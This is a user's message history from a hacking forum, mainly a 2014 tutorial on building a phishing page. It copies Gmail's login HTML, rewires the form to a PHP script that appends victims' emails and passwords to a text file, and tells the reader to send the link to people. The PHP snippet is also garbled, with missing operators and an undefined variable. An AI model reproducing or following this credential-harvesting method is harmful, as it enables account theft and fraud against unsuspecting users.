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Messages - Jackk

Pages: [1]
Tutorials / Re: [TUTORIAL] Creating A Very Basic Phishing Page
« on: June 30, 2014, 03:18:59 AM »
Ok I'm fine with that.. but why would this be removed?

Tutorials / Re: [TUTORIAL] Phishing
« on: June 30, 2014, 03:11:02 AM »
why will this be removed?

Tutorials / [TUTORIAL] Creating A Very Basic Phishing Page
« on: June 30, 2014, 02:17:31 AM »
Hello EvilZone members!
This is my first post, and my first tutorial!  8)

First I would like to point out that phishing is a very basic level of hacking and should really only be used for experience in the language you are learning, in this case I'm using php.

But to get straight to the point here are step by step instructions on how to phish.

1) sign up for a free subdomain here:
Code: [Select] I would recommend this site for anything you are doing related to websites because there isn't any advertising, it's free, and it allows you to use whatever language you want to.

2) go to the website that you want to use for phishing.  In this case I'm using Gmail.

3) copy the source html code from the site and paste it into a new file in your publiuc_html folder in 000webhost, name the file whatever you'd like, (perferably index.html.)

4) hit "CTRL" and "F" on your keyboard and look up "<form" delete all of the results AND the attributes inside the form tag. If you are new to html by that i mean delete everything between "<form" and the next ">".

5) hit "CTRL" and "F"[/size][/font][/size][size=78%] again but this time look up "type="submit"" you should only get one result which will be a button. The button will more than likely be in the "input" tag.  Directly after the input tag type "</form>" then scroll up until you find the input tag with the id username.  Directly before that type "<form action="write.php" method="get">"

6) save your file and then make a new one.  This one will be called write.php.

7) copy and paste the following code into your write.php:
Code: (php) [Select]
$passwd $_GET['Passwd'];
$fo fopen("fisher.txt""a");
$fw fwrite($fo"$email$passwd\n");

8 ) make a new file called fisher.txt

9) send people links to your official looking login page and watch the passwords roll in!

Pages: [1]

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